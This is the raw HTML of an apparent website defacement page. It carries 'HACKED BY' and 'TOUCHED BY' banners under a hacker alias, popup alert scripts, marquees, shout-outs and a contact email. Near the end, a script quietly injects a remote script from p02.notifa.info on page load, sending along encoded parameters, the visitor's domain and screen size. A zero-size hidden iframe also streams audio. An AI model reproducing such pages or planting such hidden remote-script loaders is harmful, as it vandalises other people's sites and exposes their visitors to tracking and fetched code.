<html>
<head>
<style type="text/css">
<!--
.style1 {color: #FF0000}
.style2 {color: #0000FF}
.style3 {
	color: #00FF00;
	font-weight: bold;
}
-->
</style>
</head>
<body <style="">
  

 <title>Defaced By Ｋ工Ｋ工刀ム匕</title> 
<script> alert('Hy My Brother mwhehe') </script><script> var nama = prompt("What Your Name?");
if(nama == "Ｋ工Ｋ工刀ム匕"){
alert("welcome");}
else{
alert ("Hi It's Me Ｋ工Ｋ工刀ム匕");
}

</script>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script>alert("Ｋ工Ｋ工刀ム匕 Wuzz HERE!!!")</script>
<script> alert('From Indonesia') </script>
 <style type="text/css">body {background-color:  black;background-image: url("https://3.bp.blogspot.com/-5Ma3lIrkPCk/W5p-c6bBmsI/AAAAAAAAALw/Gh-OIZLSiJc3QRCyShSytMNAtpUQoSSXQCLcBGAs/s320/Gambar%2BAnimasi%2BPetir%2BBergerak%2BWallpaper%2BKilat%2BMerah%2BLuar%2BBiasa.gif");background-repeat: no-repeat;background-size: 100% 100%;}</style> 
 <meta property="og:title" content= By Ｋ工Ｋ工刀ム匕"> 
 <meta property="description" content="HACKED BY Ｋ工Ｋ工刀ム匕"> 
 <meta property="og:author" content= Newbie"> 
 <meta charset="UTF-8"> 
 <link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet"> 
 <link href="https://fonts.googleapis.com/css?family=Orbitron" rel="stylesheet"> 
 <link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet"> 
 <style>
body {
   overflow: hidden;
   background-color: black;
}
</style> 
 <style>
h1{
   font-size: 70px;
   font-family: 'Orbitron';
   font-style: error;
   font-weight: 400;
   src: local('Orbitron Regular'), local('Orbitron-Regular'), url(https://fonts.gstatic.com/s/orbitron/v9/yMJRMIlzdpvBhQQL_Qq7dy0.woff2) format('woff2');
   color: lime;
   text-shadow: 0 0 5px #fff, 0 0 10px #fff, 0 0 20px #ffffff, 0 0 30px red, 0 0 40px red, 0 0 55px #63DAE3, 0 0 75px #63DAE3;
   text-align: center;
Img
-webkit-animation-name: blinker;
-webkit-animation-duration: 3s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 2s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

animation-name: blinker;
animation-duration: 1s;
animation-timing-function: linear;
animation-iteration-count: infinite;
}
@-moz-keyframes blinker {
   0% { opacity: 1.0; }
   50% { opacity: 0.0; }
   100% { opacity: 1.0; }
}
@-webkit-keyframes blinker {
   0% { opacity: 1.0; }
   50% { opacity: 0.0; }
   100% { opacity: 1.0; }
}
</style> 
 <center>
  <i><font color="red" size="37">
    <marquee behavior="alternate" direction="right">
     <marquee width="150">
     Newbie       </marquee>
    </marquee></font></i>
 </center> 
 <br>
 <center>
  <font color="lime" size="37">
   <marquee behavior="alternate" direction="left">
    <marquee width="150">
     TOUCHED BY Ｋ工Ｋ工刀ム匕
    </marquee>
   </marquee></font>
 </center> 
 <center>
  <a href="https://ibb.co/bFvZW0V"><img src="https://i.ibb.co/8bxpKCw/IMG-20190515-WA0069.jpg" alt="1557614714993" border="0"></a><br /><a target='_blank' href='https://carinsuranceguru.org/aaa-vehicle-insurance-overview'></a>
  
  <center>
   <font face="VT323" size="10" color="white">Hi Bro It's Me Ｋ工Ｋ工刀ム匕</font>
  </center> 
  <center>
   <i><font color="aqua"<><br><font color="white">Don't Forget Patch Your Bug And Have A Nice Day</font></font></i>
  </center>
   <center>
     <font color="aqua"><b><font size="14">ME IS </font></b></font><b><font size="14"><span class="style1">NEWBIE !!!</span></font></b> 
   </center> 
    <center>
     <h1><font color="aqua"><b><i><font color size="15""white"="">Ｋ工Ｋ工刀ム匕</font></i></b></font></h1>
    </center> 
    <font color="aqua"><b></b></font><center class="style3">
      SORRY ADMIN
    </center> 
    <font color="aqua"><b><marquee behavior="scroll" direction="right" scrollamount="25" scrolldelay="40" width="100%"> 
     <font color="green">________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
     </font>
     </marquee> 
     <center>
     <div style="text-shadow: 0px 0px 0px green;">
     <span style="color: white;"><font face="transformers"><b>special thank's to :</b></font></span>
     </div>
     </center> 
    </b></font>
   <center>
     <font color="aqua"><b><font face="transformers"><span class="style2">
     <marquee behavior="scroll" direction="left" scrollamount="3" scrolldelay="1" width="30%">
     </marquee>
         </span></font></b></font><b><font face="transformers"><span class="style2">
         <marquee behavior="scroll" direction="left" scrollamount="3" scrolldelay="1" width="30%">
         <font size="12">|Evr!|R - ALL ANONYMOUS - And You| </font>
         </marquee>
         </span></font></b><font color="aqua"><b><font face="transformers"><span class="style2">
         <marquee behavior="scroll" direction="left" scrollamount="3" scrolldelay="1" width="30%">
         </marquee>
         <marquee behavior="scroll" direction="left" scrollamount="3" scrolldelay="1" width="30%">
         </marquee>
         </span>
         </font></b></font>
   </center>
    <font color="aqua"><b><font face="transformers"><b>
    <marquee behavior="scroll" direction="left" scrollamount="25" scrolldelay="40" width="100%"> 
    <font color="green">______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ </font>
    </marquee> 
    <p></p>
    </b></font><b>
    </b></b></font><center>
     <h1><font color="aqua"><b><font face="transformers"><font face="VT323" size="10000">CONTACT ME = kiki240dgt@gmail.com </font></font></b></font></h1> 
     <center>
     <font color="aqua"><b><i><font size="5">Think of it as a beginner, so this world will be open to you </font></i>
     </b></font>
     </center> 
    </center>
    
 </center>
     <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2ZWGbkH3l9vrgBq786jHMdopsK%2f%2fpQFJcwLrat1ZBQsEGcZFtLXlGYFeOUMVmicTbyVkZGbrP4v13Mp%2b6NUnIgniuSUAytomBv0paKmUwd%2bmQ0O%2bXgXHpl3c%2bxXzBk%2fmSL14tUzfmjMKxlB%2fVy7AUYkq0Hmra%2fv0a81rc6RXI791ntK7rPx5%2ftAAz%2fecuwFP8oIIMu0hlA88j%2bADTvAa57XI%2bVDW%2faJf3Qw0H0vkDkFyUaozYX0PJWXjY0eLlfpLI4f6VqAFI%2fcK6qSC17ErhJc9PvHBZSYHdPpP8tRSm30vK%2fTP49YPK7p24I0FBteNdgv2YRCGEN3jbOXAnd%2fxCLP2jnpCqeGfrMM%2bvATVU5CD1nvv%2bNmtIAzAuV0rktVsLLyj0Cq1XzVJiYz8ONr0JicFanPAeiHOBvGF6AiuaSiE4ix2f1BC3GulLsOmXXWuJmaJtN1GEzJaHKZvJzsHy8mKJdtijUUmVQidULG%2b1t1GGgMuQdXHGdprm3IkJ5UvjNGf56ut%2byoYVKZAjh1%2f7XALs6Xeu1NV%2b%2f93jfpB7zGQ%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
<iframe width="0" height="0" src="https://api.soundcloud.com/tracks/45719017/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" frameborder="0" allowfullscreen auotoplay=""></iframe>     
</html>
